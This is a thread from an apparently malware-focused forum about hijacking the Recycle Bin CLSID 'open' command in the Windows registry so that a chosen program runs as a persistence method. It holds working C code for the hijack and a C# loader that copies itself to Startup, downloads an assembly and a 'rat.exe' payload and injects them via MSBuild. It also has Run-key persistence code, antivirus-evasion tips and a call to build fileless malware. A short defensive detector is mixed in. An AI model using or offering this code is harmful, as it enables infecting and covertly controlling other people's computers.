Article: Persistence via Recycle Bin

qGodless

Discovered by ethereal__vx

This entry in this series derives from a proof-of-concept illustrated by Hexacorn, initially published May 28th, 2018 (Beyond good ol’ Run Key, Part 78).

Introduction:
The Class ID, or CLSID, is a globally unique identifier that identifies a Windows COM class object. It allows operating systems and software to detect and access COM objects without identifying them by name. A typical CLSID in the registry looks like {645FF040-5081-101B-9F08-00AA002F954E}. Entries for the CLSID are present in HKEY_CLASSES_ROOT (HKCR). Values in HKCR are a merged view from both HKCU (HKEY_CURRENT_USER) and HKLM (HKEY_LOCAL_MACHINE). Because of this, the majority of HKCR is read-only. However, some keys allow a non-elevated user to both read and write. The registry hive contains keys and subkeys that can be used to change HKCR settings for file extensions to introduce a malicious proxy executable that can launch the appropriate file. Fortunately, the use of CLSIDs and their functionality is well documented by Microsoft. This can give a better insight into what they are, how they operate, and various vulnerabilities which may be present by hijacking them and being used by malware authors. We would be focusing on the “Shell” subkey in regard to the CLSID associated with the Recycle Bin.

Don't understand?

Our approach to this persistence method would be simple. We would open a handle to the registry key “HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell” and create a subkey “open\command”.
When we create the subkey, the target registry path would look as follows:

[Image: Capture.PNG]

Now we’ll modify the command and set its value to point to “Calc.exe or cmd.exe” or our malicious application ('notapad.exe' in my case).

[Image: Captur1e.PNG]


The result of this code is that when the user opens the Recycle Bin, it executes the malicious application.

C:
#include <Windows.h>
#include <stdio.h>

#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))

DWORD P0x4(VOID);

int main(VOID)
{
    DWORD dwReturn = P0x4();

    if (dwReturn != ERROR_SUCCESS)
    {
        return (int)dwReturn;
    }

    return ERROR_SUCCESS;
}

DWORD P0x4(VOID)
{
    HKEY    hKey = HKEY_CLASSES_ROOT;
    /* Recycle Bin CLSID; "shell\open\command" is the verb the shell runs on open */
    WCHAR   lpSubKey[WCHAR_MAXPATH] = L"CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command";
    WCHAR   lpData[WCHAR_MAXPATH] = L"CALC.EXE";
    HKEY    phkResult = NULL;
    HKEY    hkResult = NULL;      /* was uninitialised; the cleanup path tests it */
    DWORD   dispositions = 0;
    LSTATUS status = ERROR_SUCCESS;

    /* Reg* APIs return the error code directly; GetLastError() is not set by them.
       The explicit W variants match the WCHAR buffers whether or not UNICODE is defined. */
    status = RegCreateKeyExW(hKey, lpSubKey, 0, NULL,
        REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkResult, &dispositions);
    if (status != ERROR_SUCCESS)
    {
        goto EXIT_ROUTINE;
    }

    status = RegOpenKeyExW(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult);
    if (status != ERROR_SUCCESS)
    {
        goto EXIT_ROUTINE;
    }

    /* Write only the string and its terminator, not the whole buffer (sizeof(lpData)) */
    status = RegSetValueExW(phkResult, NULL, 0, REG_SZ, (PBYTE)lpData,
        (DWORD)((lstrlenW(lpData) + 1) * sizeof(WCHAR)));
    if (status != ERROR_SUCCESS)
    {
        goto EXIT_ROUTINE;
    }

EXIT_ROUTINE:

    if (phkResult)
    {
        RegCloseKey(phkResult);
    }

    if (hkResult)
    {
        RegCloseKey(hkResult);
    }

    return (DWORD)status;
}
 
HKCR is a virtual key that combines COM settings from HKLM\Software\Classes and HKCU\Software\Classes. You need admin rights to write to HKLM or HKCR; however, this might work if you write it to HKCU, which should be possible without admin rights.
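A defender-side check for the post above and for the reply's point that HKCU\Software\Classes feeds the HKCR view. This is an added example, not code from the post or any reply: it parses a .reg export (the sample below is constructed) and flags any shell\open\command defined under the Recycle Bin CLSID in HKCR, HKLM\SOFTWARE\Classes or HKCU\SOFTWARE\Classes, on the assumption that a stock install defines no "open" verb there.

```python
import re

# Recycle Bin CLSID quoted in the post.
RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"

# The merged HKCR view and the two hives that feed it (assumed export spellings).
HIVE_PREFIXES = (
    r"HKEY_CLASSES_ROOT\CLSID",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID",
    r"HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID",
)

_SECTION = re.compile(r"^\[(.+)\]$")        # [HKEY_...\path]
_DEFAULT_VALUE = re.compile(r'^@="(.*)"$')   # @="..." default value line


def parse_reg_export(text):
    """Parse only what we need from .reg syntax: key headers and their default (@) values.
    Returns {key_path: default_value_or_None} in file order."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _SECTION.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, None)
            continue
        m = _DEFAULT_VALUE.match(line)
        if m and current is not None:
            # .reg escapes backslashes and quotes with a backslash; undo that.
            keys[current] = re.sub(r"\\(.)", r"\1", m.group(1))
    return keys


def find_recycle_bin_hijack(text):
    """Return (key_path, command) for every shell\\open\\command under the Recycle Bin
    CLSID in any hive that feeds HKCR. Assumption: a stock install defines none."""
    suspects = {(p + "\\" + RECYCLE_BIN_CLSID + r"\shell\open\command").lower() for p in HIVE_PREFIXES}
    return [(path, value) for path, value in parse_reg_export(text).items() if path.lower() in suspects]


# Constructed sample export: one hijack planted in HKCU (no admin needed), one unrelated key.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command]
@="C:\\Users\\Public\\notapad.exe"

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000000}\shell\open\command]
@="C:\\Windows\\System32\\notepad.exe"
"""

if __name__ == "__main__":
    for path, cmd in find_recycle_bin_hijack(SAMPLE_EXPORT):
        print("Recycle Bin open verb hijacked:", path, "->", cmd)
```

Feed it `reg export HKCU\SOFTWARE\Classes\CLSID out.reg` (decoded from UTF-16) and the equivalent HKLM and HKCR exports; any hit is worth an incident ticket since the verb has no legitimate owner.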
 
C#:
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text;


namespace Mectury
{

    // Token: 0x02000002 RID: 2
    internal static class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        [STAThread]
        private static void Main()
        {
            {
                string friendlyName = AppDomain.CurrentDomain.FriendlyName;
                string destFileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName;
                try
                {
                    if (!File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName))
                    {
                        File.Copy(Application.ExecutablePath, destFileName);
                    }
                }
                catch (Exception)

                {
                }
                WebClient webClient = new WebClient();
                ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
                ServicePointManager.Expect100Continue = true;
                string donusturme = Encoding.UTF8.GetString
                    (Convert.FromBase64String("aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTgzNjY5NzU3MzQzNTY3ODcyLzk4NjU1MjIwNjM2OTExNjE5MC9xQ1FBR1FyeXJaa3NzUU1MQ1B5QXdranR2cWJUbmJ1bmRyTmtnZkNtUmVVbXJITUd4TWN5VGN5UmRHdlVyVlFzQU5hRFV4V2h0ekxnTFpZYWZEVFRLZnpQTENBdFhhR1NDbnV5VkxBeUFtYWZtVGZMa2RxclNCcUJ3QVhza1Aud2VicA=="));
                byte[] rawAssembly = webClient.DownloadData(donusturme);
                int[] array = new int[5];
                int[] array2 = new int[]
                {1,2,3,4,5}; int[] array3 = new int[] { 1, 2, 3, 4, 5 }; int[] array4 = new int[] { 1, 2, 3, 4, 5 }; int[] array5 = new int[] { 1, 2, 3, 4, 5 };
                WebClient webClient2 = new WebClient();
                string @yolhgs = Encoding.UTF8.GetString(Convert.FromBase64String("google.com/rat.exe"));
                Uri yolyordam = new Uri(@yolhgs);
                byte[] gelis = webClient2.DownloadData(yolyordam);
                object gidis = new object[]
                {
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe",
                string.Empty,
                gelis,
                true

                };
                string hedef = null;
                Assembly assembly = Assembly.Load(rawAssembly);
                assembly.GetType("ChromeUpdate2022.dJfaqrEmVM").InvokeMember("vkPHjQgjHx", BindingFlags.InvokeMethod, null, hedef, (object[])gidis);
            }
        }

    }
}


An old method I use: runPE is a DLL; you can use the ArmDot encryptor to encrypt it and inject the exe from within the project. For example, you can meet your daily/weekly FUD needs by using junk code with this method, like RegAsm.
 
HKCR is a virtual key that combines COM settings from HKLM\Software\Classes and HKCU\Software\Classes. You need admin rights to write to HKLM or HKCR; however, this might work if you write it to HKCU, which should be possible without admin rights.
Yeah, anything inside "HKCR" is impossible to modify without admin rights. Though inside "HKCR\CLSID", with or without admin rights, you can't modify. The only thing I found is the Recycle Bin.
 
C#:
// .NET 3.5

Write(Microsoft.Win32.Registry.LocalMachine, @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "WordWatcher", "\"" + Application.ExecutablePath.ToString() + "\"");


// or delete startup 
key.DeleteValue("your_app_name",false);
 
C#:
// .NET 3.5

Write(Microsoft.Win32.Registry.LocalMachine, @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "WordWatcher", "\"" + Application.ExecutablePath.ToString() + "\"");


// or delete startup
key.DeleteValue("your_app_name",false);
That will need malware. My goal for now is to make fileless malware. Wanna help me out?)
 

